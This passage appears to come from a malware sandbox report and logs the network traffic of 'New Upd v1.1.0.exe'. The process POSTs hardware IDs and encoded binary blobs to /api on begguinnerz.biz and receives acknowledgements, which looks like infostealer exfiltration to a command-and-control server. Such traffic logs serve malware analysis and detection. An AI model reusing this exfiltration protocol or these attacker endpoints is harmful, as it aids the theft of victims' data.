2024-12-27 22:21:15 UTC	240	IN	Data Raw: 32 64 38 39 0d 0a 70 68 55 59 73 44 2f 57 64 4b 71 56 70 47 68 4f 48 71 64 34 73 65 77 4c 33 36 38 55 30 48 66 42 53 4e 7a 2f 66 34 36 57 6c 46 4c 64 4e 32 36 53 42 65 4a 59 69 4f 62 42 53 6e 52 34 78 68 54 43 69 53 66 39 7a 6e 44 79 54 61 63 70 73 49 77 61 6f 72 54 69 50 34 51 76 66 74 46 54 70 52 47 47 74 38 45 51 62 43 54 38 41 35 4f 4a 5a 66 32 56 4e 72 55 64 6f 79 6d 77 6e 52 37 6c 2b 65 51 2b 78 58 31 30 31 31 65 7a 46 38 37 30 79 41 55 72 65 38 49 5a 32 34 4a 69 73 73 64 35 38 6c 76 6a 4c 61 62 64 52 61 7a 62 38 53 62 48 57 48 6e 44 56 50 51 4a 68 75 36 47 44 53 41 38 6e 56 72 51 69 57 6d 7a 79 58 43 37 48 36 6b 67 75 4a 77 62 35 4f 62 39 4e 4d 35 39 65 74 52 57 75 52 37 61 2b 63 49 43 49 48 33 49 47 5a Data Ascii: 2d89phUYsD/WdKqVpGhOHqd4sewL368U0HfBSNz/f46WlFLdN26SBeJYiObBSnR4xhTCiSf9znDyTacpsIwaorTiP4QvftFTpRGGt8EQbCT8A5OJZf2VNrUdoymwnR7l+eQ+xX1011ezF870yAUre8IZ24Jissd58lvjLabdRazb8SbHWHnDVPQJhu6GDSA8nVrQiWmzyXC7H6kguJwb5Ob9NM59etRWuR7a+cICIH3IGZ
2024-12-27 22:21:15 UTC	1369	IN	Data Raw: 50 41 4b 62 72 56 4e 75 70 56 38 42 69 39 6a 41 7a 35 2b 65 59 32 68 47 67 30 79 78 32 7a 47 6f 69 76 68 67 49 67 63 73 41 5a 33 49 6c 6f 76 64 39 35 73 68 61 72 49 72 71 58 45 75 50 37 2b 44 72 44 66 33 50 56 55 72 4d 65 7a 76 6a 46 53 6d 49 38 77 67 4b 54 31 69 6d 64 33 58 57 78 41 61 34 37 2f 6f 4a 54 39 62 54 78 50 49 51 76 4f 74 52 54 74 52 76 49 35 63 34 42 4a 33 6e 58 45 64 71 44 5a 4c 33 41 66 4c 30 57 6f 79 32 30 6c 78 4c 6d 38 50 73 39 77 6e 64 36 6b 68 50 30 45 64 43 33 6e 6b 6f 50 65 64 55 64 33 35 67 72 68 34 31 70 2f 41 7a 6a 4c 62 4c 64 52 61 7a 38 38 7a 50 48 66 48 58 52 56 62 38 45 79 4f 58 41 42 79 6c 75 77 78 2f 64 68 47 71 76 78 33 69 30 46 71 6f 68 74 35 67 61 36 4c 53 34 63 4d 4e 76 4f 6f 6f 64 6c 52 76 44 2b 38 77 64 4c 44 7a 61 56 Data Ascii: PAKbrVNupV8Bi9jAz5+eY2hGg0yx2zGoivhgIgcsAZ3Ilovd95sharIrqXEuP7+DrDf3PVUrMezvjFSmI8wgKT1imd3XWxAa47/oJT9bTxPIQvOtRTtRvI5c4BJ3nXEdqDZL3AfL0Woy20lxLm8Ps9wnd6khP0EdC3nkoPedUd35grh41p/AzjLbLdRaz88zPHfHXRVb8EyOXAByluwx/dhGqvx3i0Fqoht5ga6LS4cMNvOoodlRvD+8wdLDzaV
2024-12-27 22:21:15 UTC	1369	IN	Data Raw: 33 7a 58 36 33 46 4b 6b 67 2f 74 4e 64 36 2b 79 32 61 49 52 47 62 64 6b 66 67 52 58 47 2b 63 45 63 62 47 4f 4c 41 35 4f 4a 5a 66 32 56 4e 72 38 64 70 69 2b 78 6e 42 66 69 38 66 77 38 7a 48 6c 35 77 46 4b 77 46 73 54 2f 7a 41 63 69 65 4d 30 54 32 49 56 76 76 63 78 38 38 6c 76 6a 4c 61 62 64 52 61 7a 41 38 54 7a 4a 65 44 6a 6e 58 72 6f 59 7a 2b 47 47 46 57 4a 6c 68 52 33 66 7a 6a 48 39 77 58 2b 79 48 71 6b 75 76 70 6f 51 36 66 66 78 4d 38 6c 77 63 4e 78 61 73 42 72 42 2b 73 41 4b 4b 33 6a 41 43 4e 61 48 5a 62 47 4e 4f 50 49 53 75 32 72 6d 33 54 4c 72 34 76 55 66 78 32 5a 7a 6b 6b 4c 36 44 34 6a 77 79 6b 70 30 50 4d 49 66 32 34 56 76 74 63 31 6b 74 78 75 6f 4b 37 53 62 48 4f 48 34 38 44 44 46 64 33 7a 65 58 62 4d 52 32 75 58 44 44 44 35 32 68 56 53 54 69 58 Data Ascii: 3zX63FKkg/tNd6+y2aIRGbdkfgRXG+cEcbGOLA5OJZf2VNr8dpi+xnBfi8fw8zHl5wFKwFsT/zAcieM0T2IVvvcx88lvjLabdRazA8TzJeDjnXroYz+GGFWJlhR3fzjH9wX+yHqkuvpoQ6ffxM8lwcNxasBrB+sAKK3jACNaHZbGNOPISu2rm3TLr4vUfx2ZzkkL6D4jwykp0PMIf24Vvtc1ktxuoK7SbHOH48DDFd3zeXbMR2uXDDD52hVSTiX
2024-12-27 22:21:15 UTC	1369	IN	Data Raw: 74 52 6e 6a 63 76 36 65 45 75 58 37 2f 6a 6a 4c 65 48 37 63 57 37 49 62 7a 66 6a 4d 47 43 52 79 79 42 48 63 68 58 75 39 77 48 4b 2b 45 61 73 68 74 4e 31 54 72 50 50 75 63 4a 77 33 54 39 39 53 74 42 58 65 74 39 6c 45 4e 54 7a 43 46 70 50 57 4b 62 48 44 64 72 30 5a 72 79 47 32 6e 42 48 69 38 2f 4d 35 7a 48 39 6f 30 31 6d 38 46 38 62 34 78 77 34 70 65 63 45 64 31 34 68 6d 2f 59 4d 32 74 51 33 6a 63 76 36 79 4f 74 6d 32 31 77 71 45 61 44 54 4c 48 62 4d 61 69 4b 2b 47 42 69 39 77 7a 52 58 56 68 32 57 33 78 48 32 2b 48 71 63 6d 74 35 67 62 37 66 48 7a 4d 63 42 37 63 4e 52 65 74 78 6e 48 2b 4d 35 4b 59 6a 7a 43 41 70 50 57 4b 5a 6a 61 66 62 77 54 34 7a 58 77 68 46 33 72 2b 4c 5a 6f 68 48 74 7a 31 46 75 78 47 73 6e 78 7a 67 38 6b 65 4d 51 63 31 59 31 6d 75 63 68 Data Ascii: tRnjcv6eEuX7/jjLeH7cW7IbzfjMGCRyyBHchXu9wHK+EashtN1TrPPucJw3T99StBXet9lENTzCFpPWKbHDdr0ZryG2nBHi8/M5zH9o01m8F8b4xw4pecEd14hm/YM2tQ3jcv6yOtm21wqEaDTLHbMaiK+GBi9wzRXVh2W3xH2+Hqcmt5gb7fHzMcB7cNRetxnH+M5KYjzCApPWKZjafbwT4zXwhF3r+LZohHtz1FuxGsnxzg8keMQc1Y1much
2024-12-27 22:21:15 UTC	1369	IN	Data Raw: 43 53 78 6e 67 2f 74 2b 66 30 69 77 33 68 2b 31 56 47 79 47 63 37 32 77 77 41 67 65 38 41 52 33 49 49 70 38 34 31 78 71 6c 58 37 61 70 43 57 44 76 76 33 2b 44 76 53 62 44 72 4e 45 36 31 57 7a 2f 75 47 55 6d 78 2f 7a 68 48 58 6a 6d 57 39 79 58 75 79 42 36 77 74 75 5a 51 57 2f 76 37 78 4e 38 39 2f 63 64 31 62 70 68 72 47 35 63 4d 59 50 6a 79 4c 57 74 53 57 4b 65 57 4e 51 4c 55 46 73 79 6e 38 72 41 76 76 34 76 30 39 79 44 64 6c 6e 45 54 30 45 63 53 33 6e 6b 6f 71 63 38 77 5a 33 49 39 67 73 63 42 7a 75 78 43 69 4c 4c 71 58 46 2b 7a 79 38 44 48 42 66 58 6e 54 56 37 30 52 77 50 44 46 47 47 77 79 68 52 33 4c 7a 6a 48 39 35 48 47 67 47 37 4e 71 6f 64 4d 45 72 50 50 36 63 4a 77 33 66 74 68 53 73 42 48 45 38 63 4d 4d 49 58 33 4b 47 39 4f 42 62 62 62 45 63 4c 4d 59 Data Ascii: CSxng/t+f0iw3h+1VGyGc72wwAge8AR3IIp841xqlX7apCWDvv3+DvSbDrNE61Wz/uGUmx/zhHXjmW9yXuyB6wtuZQW/v7xN89/cd1bphrG5cMYPjyLWtSWKeWNQLUFsyn8rAvv4v09yDdlnET0EcS3nkoqc8wZ3I9gscBzuxCiLLqXF+zy8DHBfXnTV70RwPDFGGwyhR3LzjH95HGgG7NqodMErPP6cJw3fthSsBHE8cMMIX3KG9OBbbbEcLMY
2024-12-27 22:21:15 UTC	1369	IN	Data Raw: 52 64 36 2f 69 32 61 49 52 33 63 4e 64 58 75 52 58 48 39 4e 51 4c 4b 6d 37 46 46 39 6d 63 59 37 62 49 65 37 38 59 6f 43 79 34 6c 68 48 2b 2f 66 59 7a 7a 7a 63 30 6b 6c 71 73 56 70 43 33 35 52 30 36 64 73 49 57 78 59 56 6f 76 74 74 37 6f 6c 58 74 61 71 2b 61 44 4b 79 73 34 43 44 54 63 47 57 63 52 50 51 52 78 4c 65 65 53 69 70 31 77 78 33 56 67 48 75 34 79 33 6d 39 48 4b 6f 75 74 70 34 64 36 50 44 78 4e 63 64 37 63 64 56 65 75 78 4c 42 2b 63 38 46 62 44 4b 46 48 63 76 4f 4d 66 33 73 62 62 45 5a 72 6d 71 68 30 77 53 73 38 2f 70 77 6e 44 64 32 33 46 69 30 48 4d 37 7a 77 77 77 6d 65 63 55 52 30 49 46 74 75 38 6c 35 73 68 36 71 4b 37 69 59 46 2b 66 79 2b 7a 50 43 63 54 71 63 48 62 4d 4f 69 4b 2b 47 4b 6a 64 78 79 52 32 54 6b 53 65 6b 6a 58 47 2b 56 66 74 71 74 Data Ascii: Rd6/i2aIR3cNdXuRXH9NQLKm7FF9mcY7bIe78YoCy4lhH+/fYzzzc0klqsVpC35R06dsIWxYVovtt7olXtaq+aDKys4CDTcGWcRPQRxLeeSip1wx3VgHu4y3m9HKoutp4d6PDxNcd7cdVeuxLB+c8FbDKFHcvOMf3sbbEZrmqh0wSs8/pwnDd23Fi0HM7zwwwmecUR0IFtu8l5sh6qK7iYF+fy+zPCcTqcHbMOiK+GKjdxyR2TkSekjXG+Vftqt
2024-12-27 22:21:15 UTC	1369	IN	Data Raw: 37 74 6d 6a 39 4e 33 50 56 52 71 55 41 78 65 66 42 53 68 4d 79 68 51 4b 54 31 69 6d 49 7a 6e 69 38 45 72 55 37 38 37 6f 4c 35 76 50 6d 4e 39 4e 34 4f 70 77 64 73 6c 61 51 70 49 68 4b 4b 47 32 46 51 6f 50 63 4d 75 69 65 49 65 4a 48 76 47 53 6e 33 51 75 73 72 4b 52 2b 68 47 55 36 69 68 33 7a 46 64 72 6c 77 41 6b 36 66 34 49 6b 37 61 6c 7a 73 4d 74 68 6f 79 75 64 4c 61 53 51 47 2f 76 6c 75 69 58 48 65 58 54 56 53 2f 52 59 69 50 69 47 55 68 55 38 6a 56 72 73 77 43 6d 6c 6a 53 37 79 49 4b 41 6b 73 4a 6f 4c 2f 62 6e 52 4b 73 6c 78 62 63 4d 64 2b 6c 62 4f 74 35 35 61 59 6a 7a 42 43 35 50 57 4f 65 2b 57 49 2b 46 43 38 33 69 68 30 77 53 73 34 72 5a 6f 6c 6a 6b 36 77 42 33 73 56 6f 2f 30 31 42 67 71 66 39 4d 5a 6c 4c 42 58 6b 38 70 77 74 78 4b 7a 61 4a 43 57 43 65 Data Ascii: 7tmj9N3PVRqUAxefBShMyhQKT1imIzni8ErU787oL5vPmN9N4OpwdslaQpIhKKG2FQoPcMuieIeJHvGSn3QusrKR+hGU6ih3zFdrlwAk6f4Ik7alzsMthoyudLaSQG/vluiXHeXTVS/RYiPiGUhU8jVrswCmljS7yIKAksJoL/bnRKslxbcMd+lbOt55aYjzBC5PWOe+WI+FC83ih0wSs4rZoljk6wB3sVo/01Bgqf9MZlLBXk8pwtxKzaJCWCe
2024-12-27 22:21:15 UTC	1369	IN	Data Raw: 78 57 46 71 78 56 4c 30 57 49 6a 78 68 6c 4a 2b 4d 6f 55 65 77 73 34 78 37 5a 38 74 35 30 62 30 65 75 79 43 55 2f 57 30 34 48 43 63 4a 54 53 53 54 2f 52 4f 69 4c 44 46 47 44 35 36 78 67 7a 51 79 56 65 44 36 6e 69 31 46 4c 55 36 71 5a 4a 53 77 73 4c 58 44 76 70 69 65 64 78 54 73 77 44 5a 74 34 68 4b 49 7a 79 64 49 35 50 47 4b 59 4b 44 4e 71 70 56 2b 32 71 4c 6e 68 50 69 38 2b 41 68 69 56 42 30 31 56 79 69 42 74 2f 34 69 53 51 61 58 59 56 55 6b 34 67 70 35 5a 38 34 38 68 47 79 61 75 62 4e 54 37 65 68 70 57 65 55 4a 57 57 63 52 50 51 41 69 4b 2b 55 52 47 78 75 68 55 4b 54 79 57 71 76 33 33 43 78 41 36 42 74 67 4b 4d 36 34 76 50 33 4a 74 52 36 64 76 4e 65 70 52 7a 32 79 64 4d 4a 49 6e 4c 43 44 4d 4c 4f 4a 2f 33 43 4e 75 6f 73 34 32 4c 2b 6f 6c 4f 73 37 4c 5a Data Ascii: xWFqxVL0WIjxhlJ+MoUews4x7Z8t50b0euyCU/W04HCcJTSST/ROiLDFGD56xgzQyVeD6ni1FLU6qZJSwsLXDvpiedxTswDZt4hKIzydI5PGKYKDNqpV+2qLnhPi8+AhiVB01VyiBt/4iSQaXYVUk4gp5Z848hGyaubNT7ehpWeUJWWcRPQAiK+URGxuhUKTyWqv33CxA6BtgKM64vP3JtR6dvNepRz2ydMJInLCDMLOJ/3CNuos42L+olOs7LZ
2024-12-27 22:21:15 UTC	1369	IN	Data Raw: 5a 42 73 75 52 4c 65 34 73 55 61 4b 30 4c 37 4e 38 47 4a 65 62 36 50 57 72 55 59 72 78 53 41 71 67 7a 72 35 4c 51 57 78 32 46 35 6b 68 50 30 44 6f 69 76 68 69 63 2b 65 39 55 5a 6b 61 4a 75 73 4d 45 32 72 56 75 36 61 71 6a 64 52 62 2b 36 74 69 4b 45 4c 7a 71 56 58 71 59 45 7a 76 54 51 43 57 74 43 2b 7a 66 42 69 58 6d 2b 6a 30 65 2f 45 62 55 2f 76 59 30 61 30 73 72 62 49 73 4e 6e 65 5a 42 34 6a 6c 54 35 34 63 55 4b 49 6e 75 46 56 4a 4f 57 4b 65 57 4e 57 36 41 53 73 79 6e 38 75 43 65 75 78 65 41 7a 78 48 6c 39 6b 68 50 30 47 6f 69 76 68 67 63 2b 65 39 55 5a 6e 34 6c 7a 75 6f 31 70 2f 41 7a 6a 50 50 37 46 54 71 4b 30 35 48 43 63 4e 7a 33 63 55 4c 55 56 78 76 54 55 47 43 70 2f 30 78 6d 55 73 46 65 53 78 6e 65 69 47 4c 49 6e 75 6f 73 6a 30 74 50 77 4e 63 4e 4a Data Ascii: ZBsuRLe4sUaK0L7N8GJeb6PWrUYrxSAqgzr5LQWx2F5khP0Doivhic+e9UZkaJusME2rVu6aqjdRb+6tiKELzqVXqYEzvTQCWtC+zfBiXm+j0e/EbU/vY0a0srbIsNneZB4jlT54cUKInuFVJOWKeWNW6ASsyn8uCeuxeAzxHl9khP0Goivhgc+e9UZn4lzuo1p/AzjPP7FTqK05HCcNz3cULUVxvTUGCp/0xmUsFeSxneiGLInuosj0tPwNcNJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	104.21.92.91	443	7576	C:\Users\user\Desktop\New Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:21:17 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HCC3PJ4LT1SPICR26 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18164 Host: begguinnerz.biz
2024-12-27 22:21:17 UTC	15331	OUT	Data Raw: 2d 2d 48 43 43 33 50 4a 34 4c 54 31 53 50 49 43 52 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 48 43 43 33 50 4a 34 4c 54 31 53 50 49 43 52 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 43 43 33 50 4a 34 4c 54 31 53 50 49 43 52 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 Data Ascii: --HCC3PJ4LT1SPICR26Content-Disposition: form-data; name="hwid"A4F4F00761B3102BBEBA0C6A975F1733--HCC3PJ4LT1SPICR26Content-Disposition: form-data; name="pid"2--HCC3PJ4LT1SPICR26Content-Disposition: form-data; name="lid"HpOoIh--3fe7f419
2024-12-27 22:21:17 UTC	2833	OUT	Data Raw: cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
2024-12-27 22:21:18 UTC	1136	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:21:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4b32pa7mqe97vg18h66ad90sve; expires=Tue, 22 Apr 2025 16:07:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AzFAYC5%2BDHvI5mwPIP25kNKJUSRds%2FkUPFfMjLR3ZdgkkfdHBBxjh9yDyLRLgkdH5rxE%2B1q3fvVQq9rOBuNmQfAdYOqyvh68%2FcmGz43jvOzM%2BpbE%2BX30CMxeLH4pJ%2FIHFO0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cb3e88cb0431b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3100&min_rtt=1771&rtt_var=1613&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19124&delivery_rate=1648785&cwnd=178&unsent_bytes=0&cid=9cf982edfa36595a&ts=966&x=0"
2024-12-27 22:21:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 22:21:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	104.21.92.91	443	7576	C:\Users\user\Desktop\New Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:21:19 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PK480VEB774OH2B8VBQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8797 Host: begguinnerz.biz
2024-12-27 22:21:19 UTC	8797	OUT	Data Raw: 2d 2d 50 4b 34 38 30 56 45 42 37 37 34 4f 48 32 42 38 56 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 50 4b 34 38 30 56 45 42 37 37 34 4f 48 32 42 38 56 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 4b 34 38 30 56 45 42 37 37 34 4f 48 32 42 38 56 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 Data Ascii: --PK480VEB774OH2B8VBQContent-Disposition: form-data; name="hwid"A4F4F00761B3102BBEBA0C6A975F1733--PK480VEB774OH2B8VBQContent-Disposition: form-data; name="pid"2--PK480VEB774OH2B8VBQContent-Disposition: form-data; name="lid"HpOoIh--3f
2024-12-27 22:21:20 UTC	1127	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:21:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kjc3pk7lgq7cq9r3d1s8pogk9k; expires=Tue, 22 Apr 2025 16:07:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c5zMS6AYyaCdZBoe%2BdUS0rkRX9sB%2Bl8XsoAtwJDTgfR1h835enxrzCjuVlQEkRmmePImS4xsrfDteQAR1FhU0LvCkaKybFaMjeKYgDWSrh20TAUrvOrSfVf%2FVoUL%2BB6zw64%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cb3f6f8151902-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1495&rtt_var=579&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9736&delivery_rate=1861057&cwnd=219&unsent_bytes=0&cid=55ab99ce5a692fb2&ts=796&x=0"
2024-12-27 22:21:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 22:21:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	104.21.92.91	443	7576	C:\Users\user\Desktop\New Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 22:21:21 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=17SJPFTN8QWCK User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20414 Host: begguinnerz.biz
2024-12-27 22:21:21 UTC	15331	OUT	Data Raw: 2d 2d 31 37 53 4a 50 46 54 4e 38 51 57 43 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 46 34 46 30 30 37 36 31 42 33 31 30 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 31 37 53 4a 50 46 54 4e 38 51 57 43 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 37 53 4a 50 46 54 4e 38 51 57 43 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 0d 0a 2d 2d 31 37 53 4a Data Ascii: --17SJPFTN8QWCKContent-Disposition: form-data; name="hwid"A4F4F00761B3102BBEBA0C6A975F1733--17SJPFTN8QWCKContent-Disposition: form-data; name="pid"3--17SJPFTN8QWCKContent-Disposition: form-data; name="lid"HpOoIh--3fe7f419a360--17SJ
2024-12-27 22:21:21 UTC	5083	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-27 22:21:22 UTC	1128	IN	HTTP/1.1 200 OK Date: Fri, 27 Dec 2024 22:21:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=imp6lm2ch0b2t4mde1og07l386; expires=Tue, 22 Apr 2025 16:08:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0E9yb%2F%2FV2R7hcT9OxxHdcvmxjSe0FmrZpHC65BANM%2Bggyh3ozHmU2vJuVhfh0tThu6wPlXiTjeDAcYBGI0Uf5U0k0Q6zj3i0OOnigx7N2aSXzXgzyKYmXMPQWrogr3EPL0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8cb4058e8878d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9020&min_rtt=2036&rtt_var=5101&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21370&delivery_rate=1434184&cwnd=210&unsent_bytes=0&cid=287440547f0d1cfe&ts=960&x=0"
2024-12-27 22:21:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-27 22:21:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	104.21.92.91	443	7576	C:\Users\user\Desktop\New Upd v1.1.0.exe

Timestamp	Bytes transferred	Direction	Data
